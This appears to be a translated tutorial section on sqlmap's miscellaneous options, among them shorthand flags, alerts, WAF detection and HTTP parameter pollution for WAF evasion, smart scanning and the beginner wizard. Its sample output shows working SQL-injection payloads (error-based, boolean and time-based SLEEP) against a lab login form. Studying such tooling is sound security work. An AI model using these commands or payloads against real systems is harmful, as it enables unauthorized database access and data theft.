18, Miscellaneous 1. Using shorthand
Parameter:-Z
Some combination of parameters are often used, such as "--batch--random-agent--ignore-proxy--technique=beu", so write a large string is very bad to see, in Sqlmap, provides a shorthand way to shorten the command length.
Using the parameter "-Z", each parameter can write only the first few letters, such as "--batch" can be abbreviated as "bat". The principle of shorthand is to be able to differentiate, the corresponding parameter is the only line. Each parameter is separated by commas. Such as:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
Again such as:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2. Alarm when injection point is successfully detected
Parameter:--alert
This parameter is used to issue an alert when a new injection point is found, followed by a command to issue an alert, such as:
python sqlmap.py -r data.txt --alert "notify-send ‘Found a loophole‘"
Some of the output is as follows:
[18:59:36] [INFO] GET parameter ‘couno’ appears to be ‘OR boolean-based blind-WHERE or HAVING clause (MySQL comment) (NOT)’ injectable (with --not-string = "001")
[18:59:36] [INFO] executing alerting shell command (s) (‘notify-send‘ Vulnerability found ’‘)
The command used to issue an alert in the previous example is the Notify-send command in Ubuntu.
3. Set the answer to the question
Parameter:--answers
When running in non-interactive mode using "--batch", all problems are answered by default values. Sometimes you do not want to use the default value as the answer and want non-interactive mode, you can use the parameter "--answers" to answer specific questions, if you answer multiple questions, separated by commas. Such as:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
Some of the output is as follows:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter ‘id‘ heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for ‘MySQL‘ extending provided level (1) and risk (1)? [Y/n] N
4. A "beep" sound is emitted when the injection point is successfully detected
Parameter:--beep
Use this parameter to make a "beep" sound when the injection point is successfully detected. This parameter is especially useful when you are using "-M" to detect a large number of sites from a log file.
5. Clear the temporary tables and custom functions created by Sqlmap
Parameter:--cleanup
It is highly recommended to use this parameter to clear the temporary tables and custom functions created by Sqlmap after the test is complete, and sqlmap to clear the intrusion traces on the database management system and the file system as much as possible.
6. Check dependencies
Parameter:--dependencies
Some of the features of Sqlmap rely on third-party libraries, and when used, it is found that none of these libraries will exit with an error. Use this parameter to check whether a dependent third-party library is installed, such as:
python sqlmap.py --dependencies
Some of the output is as follows:
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires ‘python-kinterbasdb‘ third-party library in order to directly connect to the DBMS ‘Firebird‘. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python-pymssql‘ third-party library in order to directly connect to the DBMS ‘Sybase‘. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires ‘python cx_Oracle‘ third-party library in order to directly connect to the DBMS ‘Oracle‘. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python-psycopg2‘ third-party library in order to directly connect to the DBMS ‘PostgreSQL‘. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires ‘python ibm-db‘ third-party library in order to directly connect to the DBMS ‘IBM DB2‘. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires ‘python jaydebeapi & python-jpype‘ third-party library in order to directly connect to the DBMS ‘HSQLDB‘. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires ‘python ibm-db‘ third-party library in order to directly connect to the DBMS ‘Informix‘. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires ‘python-pyodbc‘ third-party library in order to directly connect to the DBMS ‘Microsoft Access‘. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires ‘python-pymssql‘ third-party library in order to directly connect to the DBMS ‘Microsoft SQL Server‘. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires ‘python-impacket‘ third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires ‘python-ntlm‘ third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires ‘websocket-client‘ third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05
You can see that I am missing a third-party library that is primarily used to connect to the database.
7. Turn off color output
Parameter:--disable-coloring
8. Specify a page that uses Google dork results
Parameter:--gpage
Using the parameter "-G" defaults to the default selection of the first 100 of Google Dork results for injection testing. Using this parameter together, you can specify a page that uses Google dork results.
9. Polluting with HTTP parameters
Parameter:--HPP
HTTP parameter contamination is a technique that bypasses waf/ips/ids, as detailed here. This technique is especially effective for asp/iis and Asp.net/iis platforms. If you suspect that the target is protected by waf/ips/ids, you can try to bypass it with this parameter.
10. Thoroughly detect Waf/ips/ids
Parameter:--IDENTIFY-WAF
Sqlmap can identify waf/ips/ids for user-specific actions such as adding "--tamper". Currently SQLMAP supports detection of more than 30 different waf/ips/ids, such as airlock and Barracuda WAF. The scripts that detect WAF can be found in the WAF directory of the installation directory.
The target of the following example is MySQL, protected by modsecurity WAF:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
Some of the output is as follows:
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset ‘ascii‘
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘USP Secure Entry Server (United Security Providers)‘[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘BinarySEC Web Application Firewall (BinarySEC)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Hyperguard Web Application Firewall (art of defence Inc.)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Cisco ACE XML Gateway (Cisco Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘TrafficShield (F5 Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KONA Security Solutions (Akamai Technologies)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Incapsula Web Application Firewall (Incapsula/Imperva)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘CloudFlare Web Application Firewall (CloudFlare)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Barracuda Web Application Firewall (Barracuda Networks)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘webApp.secure (webScurity)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Proventia Web Application Security (IBM)‘
[xx:xx:23] [DEBUG] declared web page charset ‘iso-8859-1‘
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘KS-WAF (Knownsec)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘NetScaler (Citrix Systems)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘Jiasule Web Application Firewall (Jiasule)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘WebKnight Application Firewall (AQTRONIX)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘AppWall (Radware)‘
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product ‘ModSecurity: Open Source Web Application Firewall (Trustwave)‘
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified ‘ModSecurity: Open Source Web Application Firewall (Trustwave)‘. Please consider usage of tamper scripts (option ‘--tamper‘)
Parameter:--SKIP-WAF
By default, Sqlmap sends false SQL injection playload to test if the target is protected. If you have any problems, you can disable this technique by using the parameter "--skip-waf".
11. Emulate your Smartphone
Parameter:--mobile
Some websites have different returns for smartphones and desktop environments. When you need to test a smartphone page for this site, you can set up a smartphone's user-agent, or, more simply, use this parameter, and Sqlmap will ask when it executes which of the popular phones to mimic, such as:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
12. Offline mode (only using session data)
Parameter:--offline
By adding this parameter, Sqlmap will only use previously stored session data for testing without sending any packets to the target.
13. Show page weights in Google dork
Parameter:--page-rank
Used with the parameter "-G", which causes Sqlmap to make more requests to Google and show page weights.
14. Safely remove all content from the output directory
Parameter:--purge-output
This parameter is used when the user wants to safely delete all content in the output directory. The so-called safe deletion, not only delete, but before the deletion with random data overwrite the original data, and even the file name and directory name is also renamed to overwrite the old name, all overwrite work is completed before deleting. Finally, there is nothing in the output directory. Such as:
python sqlmap.py --purge-output -v 3
Some of the output is as follows:
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory ‘/home/werner/.sqlmap/output‘...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:36
15. Quick Scan
Parameter:--smart
When there are a large number of URLs to test (for example, "-M"), the purpose is to find out if some of the injection points exist and there is no relationship between the use of "--smart" for forward heuristic scanning. At this time only to let the database management system error parameters will do further testing, the remaining URLs are skipped. such as:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter ‘ca‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘ca‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘ca‘ might not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘ca‘
[xx:xx:14] [INFO] testing if GET parameter ‘user‘ is dynamic
[xx:xx:14] [WARNING] GET parameter ‘user‘ does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter ‘user‘ might not be injectable
[xx:xx:14] [INFO] skipping GET parameter ‘user‘
[xx:xx:14] [INFO] testing if GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] confirming that GET parameter ‘id‘ is dynamic
[xx:xx:14] [INFO] GET parameter ‘id‘ is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter ‘id‘ might be
injectable (possible DBMS: ‘MySQL‘)
[xx:xx:14] [INFO] testing for SQL injection on GET parameter ‘id‘ heuristic (parsing) test showed that the back-end DBMS could be ‘MySQL‘. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for ‘MySQL‘ extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘AND boolean-based blind - WHERE or HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE or HAVING clause‘
[xx:xx:14] [INFO] GET parameter ‘id‘ is ‘MySQL >= 5.0 AND error-based - WHERE or HAVING clause‘ injectable
[xx:xx:14] [INFO] testing ‘MySQL inline queries‘
[xx:xx:14] [INFO] testing ‘MySQL > 5.0.11 stacked queries‘
[xx:xx:14] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)‘
[xx:xx:14] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind‘
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL > 5.0.11 AND time-based blind‘ injectable
[xx:xx:24] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns‘
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter ‘id‘ is ‘MySQL UNION query (NULL) - 1 to 20 columns‘ injectable
[...]
16. Use or skip payload by keyword
Parameter:--test-filter
You can use the parameter "--test-filter=row" only if you want to use a payload that contains the keyword "ROW". Here is an example of MySQL targeting:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
Some of the output is as follows:
[xx:xx:39] [INFO] GET parameter ’id’ is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter ’id’ might be injectable (possible DBMS: ’MySQL’)
[xx:xx:39] [INFO] testing for SQL injection on GET parameter ’id’
[xx:xx:39] [INFO] testing ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’
[xx:xx:39] [INFO] GET parameter ’id’ is ’MySQL >= 4.1 AND error-based - WHERE or HAVING clause’ injectable GET parameter ’id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
Parameter:--test-skip
If you do not want to use the payload containing the keyword "BENCHMARK", use the parameter "--test-skip=benchmark".
17. Interactive Sqlmap Shell
Parameter:--sqlmap-shell
Use this parameter to open an interactive sqlmap Shell that supports history. Such as:
[email protected]:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter ‘id‘ in ‘www.site.com/index.php?id=1‘)
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .‘| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit
18. A Simple guide for beginners
Parameter:--wizard
Sqlmap A guide for beginners with a workflow that has as few problems as possible. When the user enters the target, press ENTER to select the default answer to the end of the workflow will also get a correct result. Such as:
[email protected]:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .‘| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%‘ OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%‘ OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: ‘5.5.50-0ubuntu0.14.04.1‘
current user: ‘[email protected]‘
current database: ‘DSSchool‘
current user is DBA: True
[*] shutting down at 20:40:07
Summarize
The full reading of the SQLMAP Official Handbook has finally been a more comprehensive understanding of sqlmap. Previously just heard, now really feel the strong sqlmap, but also increasingly admire the sqlmap of the two-bit
- Bernardo Damele A. G. (@inquisb)
- Miroslav Stampar (@stamparm)
Reference documents
- SQLMAP official website
- Sqlmap User Manual
- Sqlmap Bulk Scan Burpsuite request logging
- How do I get past the login page with Wget?
- Note: Data retrieval over DNS in SQL injection Attacks
Safety Test ===sqlmap (premises) reprint